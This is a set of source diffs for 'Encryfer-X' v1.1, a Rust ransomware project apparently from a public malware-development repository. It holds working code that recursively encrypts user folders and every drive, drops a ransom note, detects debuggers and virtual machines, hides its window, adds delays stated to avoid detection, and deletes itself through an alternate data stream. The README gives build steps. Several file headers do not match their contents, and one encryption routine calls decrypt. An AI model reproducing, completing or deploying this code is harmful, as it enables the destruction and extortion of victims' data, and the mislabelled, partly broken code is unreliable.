Encryfer-X Ransomware Update

V 1.1

Author: Whitecat18

Malware-Samples/Encryfer/Encryfer-X/Cargo.toml

@@ -8,8 +8,11 @@ aes = "0.8.4"
 chacha20poly1305 = "0.10.1"
 cipher = "0.4.4"
 ctr = "0.9.2"
-dirs = "5.0.1"
+dirs = "6.0.0"
 hex = "0.4.3"
-raw-cpuid = "11.1.0"
+rand = "0.8.5"
+raw-cpuid = "11.3.0"
+rayon = "1.10.0"
 reqwest = {version = "0.12.7", features = ["blocking"]}
-winapi = { version = "0.3.9", features = ["winuser","setupapi","dbghelp","wlanapi","winnls","wincon","fileapi","sysinfoapi", "fibersapi","debugapi","winerror", "wininet" , "winhttp" ,"synchapi","securitybaseapi","wincrypt","psapi", "tlhelp32", "heapapi","shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi", "synchapi"] }
+# winapi = { version = "0.3.9", features = ["sddl","winbase","winuser","setupapi","dbghelp","wlanapi","winnls","wincon","fileapi","sysinfoapi", "fibersapi","debugapi","winerror", "wininet" , "winhttp" ,"synchapi","securitybaseapi","wincrypt","psapi", "tlhelp32", "heapapi","shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi", "synchapi"] }
+winapi = {version = "0.3.9", features = ["winuser","fileapi","handleapi","minwinbase","heapapi","winbase","debugapi","errhandlingapi","tlhelp32","wincon"]}

Malware-Samples/Encryfer/Encryfer-X/README.md

@@ -1,6 +1,6 @@
-## Encryfer-X Ransomware
+## Encryfer-X Ransomware V.1.1 Updated
 
-Pronounciation: **En-cry-fer-X**
+Pronounciation: **En-cry-fer-X** 
 
 <div align="center">
 
@@ -9,40 +9,51 @@ Pronounciation: **En-cry-fer-X**
 **Encryfer-X** is a malicious software written in **RUST**, designed to encrypt files on an infected system. Once executed, it recursively scans the system for files and applies a strong encryption algorithm to render them inaccessible. To recover the encrypted files, a decryption tool is required.
 
 Created By [@5mukx](https://x.com/5mukx)
-
 <br>
 </div>
 Algorith Used : AES256 + chacha20poly1305
 
-### Functionality of this Ransomware
+### Features of Encryfer-X
+
+* Data Encryption using Parallelism . [For Stealthy and Fast W] 
+* Anti-Debug Techniques. 99% Pass Rate.
+* Anti-Vm Techniques.
+* Made Improvements in Encryption.
+* Volume Based Decryption.
+* Random Delay 10-100ms while Encryption. [Prevent Detection]
+* Added Self Deletion Techniques (On Time & Reboot delete).
 
-* File Encryption: Encrypor-X identifies and encrypts various file types, including documents, images, audio, and video files recursively at Volume Drives too.
+Future Plans:
 
-* Ransom Note: After encryption, the ransomware typically creates a ransom note containing instructions on how to obtain the decryption key. This note often demands a ransom payment in exchange for the key.
+* Polymorphic Implementations
+* Fileless Execution
+* Network Propagation
+* Data Exfiltration
+* Obfuscation of Code
+* Time Bombs
 
-* Persistence: Encrypor-X may attempt to persist on the system by checking the following requirements: 
-    * Checks if the file Runs under debug
-    * Check if the file runs under VM's
+### How to Execute.
 
-**ONCE ENCRYPTED YOU CAN'T DECRYPT IT WITHOUT THE DECRYPTED SOFTWARE WITH PROPER KEY SO SAVE THE KEY WITH PRECAUTION ;)**
+> **⚠️Warning⚠️**: This Provided Content is intended for educational purposes only. I am not responsible for any misuse or negative consequences resulting from the use of this tool.
 
+> ⚠️Note⚠️: By Default I have Enabled all features. Including Recursive Volume Encryption. To test this Ransomware comment or modify the functions !.
 
-### How to Execute 
+Build the following code.
 
-> **⚠️Warning⚠️**: This Provided Content is intended for educational purposes only. I am not responsible for any misuse or negative consequences resulting from the use of this tool.
+```
+cargo build --release
+```
 
-> ⚠️Note⚠️: By Default I have Enabled all features. Including Recursive Volume Encryption. To test this Ransomware comment the calling func() !.
+You can find the Binary file at: `./target/release/Encryfer-X.exe`
 
 To see the demo video check my tweet: [Tweet](https://x.com/5mukx/status/1829094735988076900)
 
-You need the Following 2 THings: AES wit 32.len() + Encrypted Hex Value that contains AES256 with chacha !.
+> ⚠️Note⚠️: You need the Following 2 THings: AES wit 32.len() + Encrypted Hex Value that contains AES256 with chacha !.
 
 For Decryption: [Encryfer-X-Decryptor](../Encyfer-X-Decryptor/)<br>
 To Generate Keys: [Random-Keys-Generator](../Random-Keys-Generator/)
 
-
 For More Offensive codes. Visit [Rust For Malware Development](https://github.com/Whitecat18/Rust-for-Malware-Development)
 
-
-
+For more Quality Resources Follow me on X: [@5mukx](https://x.com/5mukx)
 

Malware-Samples/Encryfer/Encryfer-X/src/encrypt.rs

@@ -1,4 +1,3 @@
-// src/encryption.rs
 
 use aes::Aes256;
 use chacha20poly1305::ChaCha20Poly1305;
@@ -22,6 +21,14 @@ pub fn encrypt_aes(file_data: &[u8], key: &[u8; 32]) -> Vec<u8> {
         encrypted_data.extend_from_slice(&encrypted_block);
     }
 
+    // Padding !
+    if let Some(&padding_size) = encrypted_data.last(){
+        let len = encrypted_data.len();
+        if padding_size as usize <= len {
+            encrypted_data.truncate(len - padding_size as usize);
+        }
+    }
+
     encrypted_data
 }
 
@@ -31,7 +38,14 @@ pub fn encrypt_chacha(file_data: &[u8], key: &[u8; 32], nonce: &[u8; 12]) -> Vec
         msg: file_data,
         aad: b"optional_data",
     };
-    cipher.encrypt(nonce.into(), payload).expect("Encryption failed")
+    // cipher.encrypt(nonce.into(), payload).expect("Encryption failed")
+    match cipher.decrypt(nonce.into(), payload) {
+        Ok(decrypted_data) => decrypted_data,
+        Err(_) => {
+            eprintln!("ChaCha Encryption failed");
+            Vec::new()
+        }
+    }
 }
 
 pub const CONTENT: &str = "Your network has been penetrated.
@@ -56,8 +70,6 @@ No system is safe
 Lol :) 
 
 Created By Smukx: [Follow Me for more Offensive Nerdy Content]
-    My Repository: https://github.com/Whitecat18
-    My Socials: https://linktr.ee/smukx
     X: https://x.com/5mukx
 
     I Have Created this program for Education Purposes only 

Malware-Samples/Encryfer/Encryfer-X/src/evade.rs

@@ -0,0 +1,84 @@
+use winapi::um::handleapi::CloseHandle;
+use winapi::um::tlhelp32::{CreateToolhelp32Snapshot, Process32First, Process32Next, PROCESSENTRY32, TH32CS_SNAPPROCESS};
+use winapi::shared::minwindef::{DWORD, FALSE};
+use std::ffi::{CStr, CString};
+
+pub(crate) fn evade_dbg() -> bool {
+    // list of dbgs !
+    let processes = vec![
+        CString::new("ollydbg.exe").unwrap(),
+        CString::new("ollyice.exe").unwrap(),
+        CString::new("ProcessHacker.exe").unwrap(),
+        CString::new("tcpview.exe").unwrap(),
+        CString::new("autoruns.exe").unwrap(),
+        CString::new("autorunsc.exe").unwrap(),
+        CString::new("filemon.exe").unwrap(),
+        CString::new("procmon.exe").unwrap(),
+        CString::new("regmon.exe").unwrap(),
+        CString::new("procexp.exe").unwrap(),
+        CString::new("idaq.exe").unwrap(),
+        CString::new("idaq64.exe").unwrap(),
+        CString::new("ImmunityDebugger.exe").unwrap(),
+        CString::new("Wireshark.exe").unwrap(),
+        CString::new("dumpcap.exe").unwrap(),
+        CString::new("HookExplorer.exe").unwrap(),
+        CString::new("ImportREC.exe").unwrap(),
+        CString::new("PETools.exe").unwrap(),
+        CString::new("LordPE.exe").unwrap(),
+        CString::new("SysInspector.exe").unwrap(),
+        CString::new("proc_analyzer.exe").unwrap(),
+        CString::new("sysAnalyzer.exe").unwrap(),
+        CString::new("sniff_hit.exe").unwrap(),
+        CString::new("windbg.exe").unwrap(),
+        CString::new("joeboxcontrol.exe").unwrap(),
+        CString::new("joeboxserver.exe").unwrap(),
+        CString::new("ResourceHacker.exe").unwrap(),
+        CString::new("x32dbg.exe").unwrap(),
+        CString::new("x64dbg.exe").unwrap(),
+        CString::new("Fiddler.exe").unwrap(),
+        CString::new("httpdebugger.exe").unwrap(),
+        CString::new("cheatengine-i386.exe").unwrap(),
+        CString::new("cheatengine-x86_64.exe").unwrap(),
+        CString::new("cheatengine-x86_64-SSE4-AVX2.exe").unwrap(),
+        CString::new("frida-helper-32.exe").unwrap(),
+        CString::new("frida-helper-64.exe").unwrap(),
+    ];
+
+    let snapshot = unsafe { 
+        CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
+    };
+
+
+    if snapshot.is_null() {
+        println!("Failed to create snapshot");
+        return false;
+    }
+
+    let mut pe: PROCESSENTRY32 = unsafe { std::mem::zeroed() };
+    pe.dwSize = std::mem::size_of::<PROCESSENTRY32>() as DWORD;
+
+    if unsafe { Process32First(snapshot, &mut pe) } == FALSE {
+        println!("Failed to enumerate first process");
+        return false;
+    }
+
+    loop {
+        let process_name = unsafe { CStr::from_ptr(&pe.szExeFile as *const i8) };
+        for process in &processes {
+            if process_name.to_bytes() == process.as_bytes() {
+                // process has been found
+                return true;
+            }
+        }
+
+        if unsafe { Process32Next(snapshot, &mut pe) } == FALSE {
+            break;
+        }
+    }
+    
+    unsafe{
+        CloseHandle(snapshot);
+        return false;
+    }
+}
+

Malware-Samples/Encryfer/Encryfer-X/src/evade_vm.rs

@@ -1,13 +1,9 @@
 /*
     Anti-Virtualization / Full-System Emulation 
-    For More Malware POC: https://github.com/Whitecat18/Rust-for-Malware-Development.git
-    Resources Used: https://github.com/LordNoteworthy/al-khaser
-    By @5mukx
+    Author: @5mukx
 */
 
-
 /*
-
 Note: 
     [Dev Machine] -> Installed VM's Softwares and some development tools for malware testing. 
     I have comment out some code due to testing purpose. If you execute this code on development machines[Dev Machine] , ofcouse its gonna result out 
@@ -20,7 +16,6 @@ Note:
                 Reduce the content of the program or artifacts and keep up the main one for 
 */
 
-
 use std::process::Command;
 use std::fs;
 use raw_cpuid::CpuId;
@@ -315,32 +310,3 @@ fn find_matching_pattern<'a>(mac_address: &'a Vec<u8>, patterns: &'a Vec<Vec<u8>
     }
     None
 }
-
-
-// Programs to find thr presence of Specific CPU Instructions !
-// There is an create that will take care of it !!
-// fn check_cpu_instruction(eax_value: u32) -> bool {
-//     let eax_value_str = format!("{:#x}", eax_value);
-//     let output = Command::new("cpuid")
-//         .args(&["-l", &eax_value_str])
-//         .output()
-//         .expect("Failed to execute cpuid cmd");
-
-//     let output_str = String::from_utf8_lossy(&output.stdout);
-//     output_str.contains(&eax_value_str)
-// }
-
-// fn detect_vendor_string(vendor_string: &str) -> bool {
-//     let output = Command::new("cpuid")
-//         .args(&["-s", "0"])
-//         .output()
-//         .expect("Failed to execute cpuid cmd");
-
-//     let output_str = String::from_utf8_lossy(&output.stdout);
-//     output_str.contains(vendor_string)
-// }
-
-// Program to use WMI Quaries to retrieve sys info !
-
-// System Firmware tables 
-// Get Syetem frimwares => soon !

Malware-Samples/Encryfer/Encryfer-X/src/file_operand.rs

@@ -1,23 +1,42 @@
-use std::ffi::{OsStr, OsString};
-use std::fs::{self, File};
-use std::io::{Read, Write};
+/*
+    functions to encrypt files
+    Author: @5mukx
+*/
+
+#![allow(dead_code)]
+
+use std::ffi::OsString;
+use std::fs::{self, File, OpenOptions};
+use std::io::{Read, Seek, SeekFrom, Write};
 use std::path::{Path, PathBuf};
+use std::thread;
+use std::time::Duration;
+use rand::Rng;
 use winapi::um::errhandlingapi::GetLastError;
 use winapi::um::fileapi::{FindFirstVolumeW, FindNextVolumeW, FindVolumeClose,GetVolumePathNamesForVolumeNameW};
-use winapi::um::winbase::MoveFileExW;
-use std::os::windows::ffi::{OsStrExt, OsStringExt};
+use std::os::windows::ffi::OsStringExt;
 use std::ptr::null_mut;
+use rayon::prelude::*;
 use crate::encrypt::{
     encrypt_aes, encrypt_chacha
 };
 
-// 
+// added random delay to avoid detection !
+fn random_delay() {
+    let mut rng = rand::thread_rng();
+    let delay = rng.gen_range(10..100); //  delay between 10 to 100ms
+    std::thread::sleep(std::time::Duration::from_millis(delay));
+}
+
+// added rayon [Parallel Encryption]
+// added Random Encryption Process ! -> randomize the order of encryption
 
 pub fn recursive_encrypt(dir: &Path, key: &[u8; 32], chacha_key: &[u8; 32], chacha_nonce: &[u8; 12]) {
     if dir.is_dir() {
         match fs::read_dir(dir) {
             Ok(entries) => {
-                for entry in entries {
+                entries.par_bridge().for_each(|entry| {
+                    random_delay(); 
                     match entry {
                         Ok(entry) => {
                             let path = entry.path();
@@ -29,14 +48,20 @@ pub fn recursive_encrypt(dir: &Path, key: &[u8; 32], chacha_key: &[u8; 32], chac
                         }
                         Err(e) => eprintln!("Failed to read entry: {}", e),
                     }
-                }
+                });
             }
             Err(e) => eprintln!("Failed to read directory '{}': {}", dir.display(), e),
         }
     }
 }
 
 fn encrypt_file(file_path: &Path, key: &[u8; 32], chacha_key: &[u8; 32], chacha_nonce: &[u8; 12]) {
+
+    if file_path.extension().and_then(|ext| ext.to_str()) == Some("exe"){
+        return;
+    }
+
+
     if file_path.extension().and_then(|ext| ext.to_str()) == Some("smukx") {
         return;
     }
@@ -84,6 +109,71 @@ fn encrypt_file(file_path: &Path, key: &[u8; 32], chacha_key: &[u8; 32], chacha_
 }
 
 
+// New Function in chunk mode ...! Problem with decryption !!
+
+// fn encrypt_file_chunks(file_path: &Path, key: &[u8; 32], chacha_key: &[u8; 32], mut chacha_nonce: [u8; 12]) {
+    // fn encrypt_file(file_path: &Path, key: &[u8; 32], chacha_key: &[u8; 32], chacha_nonce: &[u8; 12]) {
+        
+    //     // Skip .exe, .smukx, and specific files
+    //     if file_path.extension().and_then(|ext| ext.to_str()) == Some("exe") {
+    //         eprintln!("Skipping encryption for executable file: {}", file_path.display());
+    //         return;
+    //     }
+
+    //     if file_path.extension().and_then(|ext| ext.to_str()) == Some("smukx") {
+    //         return;
+    //     }
+
+    //     if file_path.file_name().map_or(false, |name| name == "readme.txt") {
+    //         return;
+    //     }
+    
+    //     // Open the file for reading and writing
+    //     match OpenOptions::new().read(true).write(true).open(file_path) {
+    //         Ok(mut file) => {
+    //             let mut buffer = [0u8; 4096]; // Buffer size
+    //             loop {
+    //                 // Read a chunk from the file
+    //                 let n = match file.read(&mut buffer) {
+    //                     Ok(0) => break, // EOF
+    //                     Ok(n) => n,
+    //                     Err(e) => {
+    //                         eprintln!("Failed to read from '{}': {}", file_path.display(), e);
+    //                         return;
+    //                     }
+    //                 };
+    
+    //                 let encrypted_aes = encrypt_aes(&buffer[..n], key);
+    //                 let encrypted_chacha = encrypt_chacha(&encrypted_aes, chacha_key, chacha_nonce);
+    
+    //                 if let Err(e) = file.seek(SeekFrom::Current(-(n as i64))) {
+    //                     eprintln!("Failed to seek in file '{}': {}", file_path.display(), e);
+    //                     return;
+    //                 }
+
+    //                 if let Err(e) = file.write_all(&encrypted_chacha) {
+    //                     eprintln!("Failed to write to '{}': {}", file_path.display(), e);
+    //                     return;
+    //                 }
+
+    //                 // Introduce random delay
+    //                 // random_delay();
+    //             }
+    
+    //             // Rename the file to add .smukx extension
+    //             let mut new_file_path = PathBuf::from(file_path);
+    //             new_file_path.set_extension("smukx");
+    //             if let Err(e) = fs::rename(file_path, &new_file_path) {
+    //                 eprintln!("Failed to rename file '{}' to '{}': {}", file_path.display(), new_file_path.display(), e);
+    //             }
+    //         }
+    //         Err(e) => eprintln!("File not found or unable to open: '{}': {}", file_path.display(), e),
+    //     }
+    // }
+    
+
+
+
 pub(crate) fn get_all_volumes() -> Vec<OsString>{
 
     let mut drive_letters = Vec::new();
@@ -146,19 +236,3 @@ pub(crate) fn get_all_volumes() -> Vec<OsString>{
     drive_letters
 
 }
-
-pub(crate) fn schedule_self_delete() {
-    let exe_path = std::env::current_exe().unwrap();
-    let exe_path_wide: Vec<u16> = OsStr::new(exe_path.to_str().unwrap())
-        .encode_wide()
-        .chain(Some(0).into_iter())
-        .collect();
-
-    unsafe {
-        MoveFileExW(
-            exe_path_wide.as_ptr(),
-            null_mut(),
-            0x00000004,
-        );
-    }
-}

Malware-Samples/Encryfer/Encryfer-X/src/main.rs

@@ -1,11 +1,51 @@
+//===============================================================================================//
+// Copyright (c) 2025, 5mukx (Smukx E)
+//
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+
+//===============================================================================================//
+//                                    Encryfer-X [Rust Ransomware]
+//===============================================================================================//
+
 /*
-    Encryfer-X is an Ransomware written in Rust. 
-    By Smukx
+    Note:
+        * ALL SETTINGS ARE ENABLED BY DEFAULT ..!
+            - Do not execute on real system [Chances of recovery are rare and less].
+            - If you want to test it on VM' disable the vm's and dbg function.
+            - Only for Education Purpose. Im not responsible for abusing activities by modifying the code.
+        * Created with ❤ by 5mukx.
 */
 
+// Run without console !
+#![windows_subsystem = "windows"]
+
+
+#![allow(unused_imports)]
 use std::path::{Path, PathBuf};
 use encrypt::create_readme_file;
-use file_operand::{get_all_volumes,schedule_self_delete};
+use file_operand::get_all_volumes;
+use self_delete::{schedule_self_delete, self_destruction};
 use winapi::um::{
     debugapi::{CheckRemoteDebuggerPresent, IsDebuggerPresent}, processthreadsapi::GetCurrentProcess, wincon::{
         FreeConsole, 
@@ -17,48 +57,55 @@ use winapi::um::{
     }
 };
 
+// Algorithm Specfics 
 use aes::Aes256;
 use aes::cipher::{KeyIvInit,StreamCipher};
 use hex::decode;
 mod encrypt;
 mod file_operand;
 mod wall;
 mod evade_vm;
+mod self_delete;
+mod evade;
+
 use wall::maldev_wallpaper;
 use dirs::{desktop_dir, download_dir, document_dir, picture_dir, audio_dir, video_dir};
 type Aes256Ctr = ctr::Ctr128BE<Aes256>;
 
 fn main() {
 
-    unsafe{
-        FreeConsole();
+    println!("Starting the Encryption");
 
-        let hwnd = GetConsoleWindow();
-        if !hwnd.is_null(){
-            ShowWindow(hwnd, 0);
-        }
-    }
-    // println!("Success Point 1");
-    
-  
-    // let aes_key: [u8; 32] = [27, 20, 127, 230, 201, 208, 178, 24, 197, 76, 96, 12, 16, 47, 231, 42, 156, 36
-    // , 136, 165, 162, 223, 206, 190, 126, 59, 96, 99, 157, 122, 32, 165]; // Replace with your AES key
-    // let chacha_key: [u8; 32] = [135, 239, 131, 39, 170, 37, 22, 137, 161, 39, 117, 6, 83, 156, 42, 242, 240, 55, 67, 47
-    // , 206, 10, 84, 170, 44, 211, 106, 74, 12, 67, 222, 158]; // Replace with your ChaCha key
-    // let chacha_nonce: [u8; 12] = [197, 126, 31, 217, 118, 253, 225, 182, 67, 54, 97, 77]; // Replace with your ChaCha nonce
 
-    // main_directory to check out !
+    // Rust has better options for this !
+    /*
+    // used to hide window ! there are plenty of methods avaiable !
+    // unsafe{
+    //     FreeConsole();
 
-    // check if binary file running at VM. Exits the Program if running !
+    //     let hwnd = GetConsoleWindow();
+    //     if !hwnd.is_null(){
+    //         ShowWindow(hwnd, 0);
+    //     }
+    // }
 
+    */
+
+    // Uncomment it to test it on VMs
+
+    // => Start 
     let vms: bool = evade_vm::evade_vms();
-    
-    if vms == false{
-        std::process::exit(0x100);
-    }
+    let dbg: bool = evade::evade_dbg();
+
 
+    if vms == false || dbg == true{
+        std::process::exit(0x100);
+    } 
+    
     // Check if the program is running an dbgger
     unsafe { debug() };
+    // => END
+
 
     // To common C:// common folders that contains sensitive files !
     let dirs_to_encrypt = vec![
@@ -70,16 +117,25 @@ fn main() {
         video_dir(),
     ];
 
+    println!("Starting the Encryption");
+
+    // Start Encrypting Important Paths !
     for dir in dirs_to_encrypt.iter().flatten(){
         encryptor(dir);
         create_readme_file(dir);
     }
 
+    volume_paths();
+
     // Use it to encrypt Volumes present in the Computer. May take some time depends upon the files victm has
     maldev_wallpaper();
-    schedule_self_delete();
-    volume_paths();
+
     display_message();
+    std::thread::sleep(std::time::Duration::from_secs(2));
+
+    // there are 2 functions that you can use it to delete. 
+    // schedule_self_delete();
+    self_destruction();
 
     std::process::exit(0x100);
 }
@@ -124,10 +180,11 @@ fn decrypt_hexa(keys: String)-> Vec<u8>{
     decrypt_vec_key
 }
 
-
 fn encryptor(dir_path: &Path){
-    // For testing ...!
-    // let dir_path: &Path = Path::new("D:/maldev/Encrypor-X/test");
+
+    // Replace your Keys generated from Random Generator.
+    // Note that this keys will extract original key from the ma1n key so do not change the keys !
+    // For new key generation. i have made a random key generator that generate keys with rand function !.
 
     let aes_key: [u8; 32] = [
         27, 20, 127, 230, 201, 208, 178, 24, 197, 76, 96, 12, 16, 47, 231, 42, 156, 36, 136, 165, 162, 223, 206, 190, 126, 59, 96, 99, 157, 122, 32, 165
@@ -140,22 +197,20 @@ fn encryptor(dir_path: &Path){
     let decrypted_keys = decrypt_combined_key(&v3c_value, &aes_key).unwrap();
     let (aes_key_dec, chacha_key, chacha_nonce) = split_keys(&decrypted_keys);
 
-
     file_operand::recursive_encrypt(
         &dir_path,
         &aes_key_dec,
         &chacha_key,
         &chacha_nonce,
     );
-    
-    // println!("{:?}", aes_key_dec); 
-    // println!("{:?}", chacha_key);  
-    // println!("{:?}", chacha_nonce);
 }
 
 fn volume_paths(){
         // To encrypt each and every disk ! 
+
         // let volumes = get_all_volumes_except_c();
+        // println!("{:?}", volumes);
+
         if get_all_volumes().is_empty() {
             return;
         }
@@ -184,4 +239,4 @@ unsafe fn debug(){
         std::process::exit(0x100);
 
     }
-}
+}

Malware-Samples/Encryfer/Encryfer-X/src/self_delete.rs

@@ -0,0 +1,135 @@
+/*
+    Self Deletion Technique
+    Author: @5mukx
+*/
+
+
+#![allow(dead_code)]
+use std::ffi::{OsStr, OsString};
+use std::os::windows::ffi::OsStrExt;
+use std::ptr::null_mut;
+use winapi::ctypes::c_void;
+use winapi::um::fileapi::{CreateFileW, SetFileInformationByHandle, FILE_RENAME_INFO};
+use winapi::um::handleapi::CloseHandle;
+use winapi::um::heapapi::HeapFree;
+use winapi::um::minwinbase::{FileDispositionInfo, FileRenameInfo};
+use winapi::um::winbase::{MoveFileExW, FILE_FLAG_DELETE_ON_CLOSE};
+use winapi::um::winnt::{FILE_ATTRIBUTE_NORMAL, HEAP_ZERO_MEMORY};
+use winapi::um::{fileapi::FILE_DISPOSITION_INFO, heapapi::{GetProcessHeap, HeapAlloc}};
+
+// One time self delete after completing operations
+pub(crate) fn self_destruction(){
+    // This stream name is for alternate stream.
+    let stream = ":smukx_stream";
+    let stream_wide: Vec<u16> = OsString::from(stream).encode_wide().chain(std::iter::once(0)).collect();
+
+    unsafe{
+        let mut delete_file = FILE_DISPOSITION_INFO{
+            DeleteFile: 1 // default value is 1
+        };
+
+        let rename_info_size = std::mem::size_of::<FILE_RENAME_INFO>() + (stream_wide.len() * std::mem::size_of::<u16>());
+        
+        // allocate memory for FILE_RENAME_INFO
+        let rename_info = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, rename_info_size) as *mut FILE_RENAME_INFO;
+
+        if rename_info.is_null() {
+            panic!("Memory allocation failed");
+        }
+
+        delete_file.DeleteFile = 1;
+        (*rename_info).FileNameLength = (stream_wide.len() * std::mem::size_of::<u16>()) as u32 - 2;
+
+        std::ptr::copy_nonoverlapping(
+            stream_wide.as_ptr(),
+            (*rename_info).FileName.as_mut_ptr(),
+            stream_wide.len(),
+        );
+
+        let path = std::env::current_exe().unwrap();
+        let mut full_path: Vec<u16> = OsString::from(path).encode_wide().collect();
+        full_path.push(0);
+
+        // Open the file with delete and synchronize permissions
+        let handle = CreateFileW(
+            full_path.as_ptr(),
+            0x00010000 | 0x00100000,
+            0x00000001,
+            core::ptr::null_mut(),
+            3, // OPEN_EXISTING
+            0 as u32, // FILE_ATTRIBUTE_NORMAL
+            null_mut(),
+        );
+
+        if handle.is_null() {
+            panic!("Failed to open file");
+        }
+
+        // rename the alternate data stream
+        let setfileinfohandle = SetFileInformationByHandle(
+            handle, 
+            FileRenameInfo, 
+            rename_info as *mut c_void, 
+            rename_info_size as u32
+        );
+
+        if setfileinfohandle == 0 {
+            panic!("Failed to set file information for rename");
+        }
+
+        CloseHandle(handle);
+
+        // Re-open the file with delete on close flag
+        let handle = CreateFileW(
+            full_path.as_ptr(),
+            0x00010000 | 0x40000000 | 0x00100000,
+            0x00000001,
+            std::ptr::null_mut(),
+            3, 
+            FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE,
+            null_mut(),
+        );
+
+        if handle == null_mut() {
+            panic!("Failed to re-open file for deletion");
+        }
+
+        // mark the file for deletion
+        let setfileinfo = SetFileInformationByHandle(
+            handle, 
+            FileDispositionInfo, 
+            &delete_file as *const FILE_DISPOSITION_INFO as *mut c_void, 
+            std::mem::size_of::<FILE_DISPOSITION_INFO>() as u32
+        );
+
+        if setfileinfo == 0 {
+            panic!("Failed to mark file for deletion");
+        }
+
+        CloseHandle(handle); // -> delete the file  
+
+        // free the allocated memory
+        HeapFree(
+            GetProcessHeap(), 
+            0, 
+            rename_info as *mut c_void,
+        );
+    }
+}
+
+pub(crate) fn schedule_self_delete() {
+    let exe_path = std::env::current_exe().unwrap();
+    let exe_path_wide: Vec<u16> = OsStr::new(exe_path.to_str().unwrap())
+        .encode_wide()
+        .chain(Some(0).into_iter())
+        .collect();
+
+    unsafe {
+        MoveFileExW(
+            exe_path_wide.as_ptr(),
+            null_mut(),
+            0x00000004,
+        );
+    }
+}
+

Malware-Samples/Encryfer/Encyfer-X-Decryptor/.gitignore

@@ -1,5 +1,5 @@
 [package]
-name = "Encypor-X-Decryptor"
+name = "Encryfer-X-Decryptor"
 version = "0.1.0"
 edition = "2021"
 
@@ -8,6 +8,8 @@ aes = "0.8.4"
 chacha20poly1305 = "0.10.1"
 cipher = "0.4.4"
 ctr = "0.9.2"
-dirs = "5.0.1"
+dirs = "6.0.0"
 hex = "0.4.3"
-winapi = {version = "0.3.9", features = ["winuser"]}
+rand = "0.8.5"
+rayon = "1.10.0"
+winapi = {version = "0.3.9", features = ["errhandlingapi","fileapi","winuser"]}

Malware-Samples/Encryfer/Encyfer-X-Decryptor/Cargo.lock

@@ -17,6 +17,14 @@ pub fn decrypt_aes(file_data: &[u8], key: &[u8; 32]) -> Vec<u8> {
         decrypted_data.extend_from_slice(&decrypted_block);
     }
 
+    // Remove padding (PKCS7)
+    if let Some(&padding_size) = decrypted_data.last() {
+        let len = decrypted_data.len();
+        if padding_size as usize <= len {
+            decrypted_data.truncate(len - padding_size as usize);
+        }
+    }
+
     decrypted_data
 }
 
@@ -26,5 +34,12 @@ pub fn decrypt_chacha(file_data: &[u8], key: &[u8; 32], nonce: &[u8; 12]) -> Vec
         msg: file_data,
         aad: b"optional_data",
     };
-    cipher.decrypt(nonce.into(), payload).expect("Decryption failed")
-}
+
+    match cipher.decrypt(nonce.into(), payload) {
+        Ok(decrypted_data) => decrypted_data,
+        Err(_) => {
+            eprintln!("ChaCha decryption failed");
+            Vec::new()
+        }
+    }
+}

Malware-Samples/Encryfer/Encyfer-X-Decryptor/Cargo.toml

@@ -1,31 +1,124 @@
-use std::fs::{self, File};
+// use std::fs::File;
+// use std::io::{Read, Write};
+// use std::path::Path;
+// use std::thread;
+// use std::time::Duration;
+// use crate::decrypt::{decrypt_aes, decrypt_chacha};
+// use rand::Rng;
+// use rayon::prelude::*;
+
+// fn random_delay() {
+//     let mut rng = rand::thread_rng();
+//     let delay = rng.gen_range(10..100); //  delay between 10 to 100ms
+//     std::thread::sleep(std::time::Duration::from_millis(delay));
+// }
+
+// pub fn recursive_decrypt(dir: &Path, key: &[u8; 32], chacha_key: &[u8; 32], chacha_nonce: &[u8; 12]) {
+//     if dir.is_dir() {
+//         match std::fs::read_dir(dir) {
+//             Ok(entries) => {
+//                 entries.par_bridge().for_each(|entry| {
+//                     random_delay(); // use the random delay here !
+//                     match entry {
+//                         Ok(entry) => {
+//                             let path = entry.path();
+//                             if path.is_dir() {
+//                                 recursive_decrypt(&path, key, chacha_key, chacha_nonce);
+//                             } else {
+//                                 decrypt_file(&path, key, chacha_key, chacha_nonce);
+//                             }
+//                         }
+//                         Err(e) => eprintln!("Failed to read entry: {}", e),
+//                     }
+//                 });
+//             }
+//             Err(e) => eprintln!("Failed to read directory '{}': {}", dir.display(), e),
+//         }
+//     }
+// }
+
+// fn decrypt_file(file_path: &Path, key: &[u8; 32], chacha_key: &[u8; 32], chacha_nonce: &[u8; 12]) {
+//     if file_path.extension().and_then(|ext| ext.to_str()) != Some("smukx") {
+//         return;
+//     }
+
+//     let mut file = match File::open(file_path) {
+//         Ok(file) => file,
+//         Err(_) => return,
+//     };
+
+//     let mut contents = Vec::new();
+//     if file.read_to_end(&mut contents).is_err() {
+//         return;
+//     }
+
+//     let decrypted_chacha = decrypt_chacha(&contents, chacha_key, chacha_nonce);
+//     let decrypted_aes = decrypt_aes(&decrypted_chacha, key);
+
+//     let mut original_file_path = file_path.to_path_buf();
